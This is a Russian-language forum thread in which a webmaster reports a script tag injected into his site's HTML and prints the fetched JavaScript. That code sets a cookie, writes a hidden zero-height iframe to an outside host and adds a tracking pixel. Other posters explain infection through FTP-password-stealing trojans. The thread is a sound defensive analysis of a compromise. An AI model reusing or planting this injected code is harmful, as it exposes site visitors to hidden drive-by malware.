Взлом?

[Stanislav]

Здравствуйте.

Сегодня я обнаружил такой странный код:

Оригинальный:

Код:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" href="style.css" type="text/css"/>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
</head>

Обнаруженный:

Код:

<script language=javascript src=http://www.1408.pl/img/msn.gif></script>                                                 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="stylesheet" href="style.css" type="text/css"/>
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
</head>

т.е лишним является:

Код:

<script language=javascript src=http://www.1408.pl/img/msn.gif></script>

перейдя по ссылки

Код:

http://www.1408.pl/img/msn.gif

получил это:

Код:

function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");
// A Popular Free Statistics Service for 200 000+ Webmasters. 
var a8520tf="51la";var a8520pu="";var a8520pf="51la";var a8520su=window.location;var a8520sf=document.referrer;var a8520of="";var a8520op="";var a8520ops=1;var a8520ot=1;var a8520d=new Date();var a8520color="";if (navigator.appName=="Netscape"){a8520color=screen.pixelDepth;} else {a8520color=screen.colorDepth;}
try{a8520tf=top.document.referrer;}catch(e){}
try{a8520pu =window.parent.location;}catch(e){}
try{a8520pf=window.parent.document.referrer;}catch(e){}
try{a8520ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8520ops=(a8520ops==null)?1: (parseInt(unescape((a8520ops)[2]))+1);var a8520oe =new Date();a8520oe.setTime(a8520oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a8520ops+ ";path=/;expires="+a8520oe.toGMTString();a8520ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8520ot==null){a8520ot=1;}else{a8520ot=parseInt(unescape((a8520ot)[2])); a8520ot=(a8520ops==1)?(a8520ot+1):(a8520ot);}a8520oe.setTime(a8520oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a8520ot+";path=/;expires="+a8520oe.toGMTString();}catch(e){}
a8520of=a8520sf;if(a8520pf!=="51la"){a8520of=a8520pf;}if(a8520tf!=="51la"){a8520of=a8520tf;}a8520op=a8520pu;try{lainframe}catch(e){a8520op=a8520su;}document.write('<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=33&id=2618520&tpages='+a8520ops+'&ttimes='+a8520ot+'&tzone='+(0-a8520d.getTimezoneOffset()/60)+'&tcolor='+a8520color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a8520of)+'&vpage='+escape(a8520op)+'" />');
}
}Get();

Вопрос номер один: Что это? кто-то пытался стянуть кукисы?
Вопрос номер два: Как они залили эту чертовщину в скрипт?

Ну если не трудно, кто знает, расскажите об этом коде...

[wyvern]

document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");

плавающий фрейм с нулевой высотой - наводит сомнения о доброжелательности сайта...

Вообще самый популярный вид взлома провайдера - троян, который вытягивает открыто хранящийся пароль из фтп-клиента и правит все индексные файлы, которые обнаруживает. Таким образом конечные пользователи сайта получают свои трояны. Все это противно и нехорошо.

Способов взлома огромное количество, и о примененном в данном случае можно только гадать.

У нас однажды все индексные файлы на всем сервере исправили на фигню какую-то. Так и не нашли дыру...

[Stanislav]

Цитата:

Сообщение от wyvern

document.writeln("<IFRaME src=\"http://www.kaishi2009.com/set4.htm\" width=100 height=0><\/IFRAME>");

плавающий фрейм с нулевой высотой - наводит сомнения о доброжелательности сайта...

Честно говоря, мне так кажеться доброжелательностью здесь и не пахнет, смущают фразы про Cookie..

[SkyM@n]

Имхо, вы пользуетесь тотал коммандером при доступе на ФТП, а троян украл пароли доступа к ФТП из файла настроек этого тотал коммандера. Часто такое случается..

[Stanislav]

имхо конечно, ну думаю что если бы утянули пароли от тотола, было бы все намного серьезнее там ведь пароли к бд.... тем более я уточнял у хостера он дал логи по входу... там только мои ip...
а по безопасности что лучше юзать в место тотола?

[memka]

не сохранять пароли! записать на бумажку и прилипнуть на монитор! :-)

[SkyM@n]

Цитата:

имхо конечно, ну думаю что если бы утянули пароли от тотола, было бы все намного серьезнее там ведь пароли к бд

не факт - это ведь не люди, а вредоносная программа пользуется кодом к ФТП и та же программа (или ее другая часть) через ФТП инклюдит в сайт-жертву в конец кода вредоносный скрипт (обычно - на все php-страницы в корневом каталоге)

[Stanislav]

Цитата:

Сообщение от memka

не сохранять пароли! записать на бумажку и прилипнуть на монитор! :-)

не факт если пароль тянет троян он может его и во время подключения утянуть...

SkyM@n, често говоря мне уже все равно как они туда его залили, меня по большей части интересует что они залили....

[DomiNick]

З.Ы. Интересненько...

Поизучал - говорят сайт, адрес которого во фрейме вируса, "используется для атак на компьютеры"...
Если кому интересно - сделал пару скринов...

[wyvern]

троян не должен "утягивать пароль". троян скорее всего с твоего же компа и отработал. под твоим же айпишником.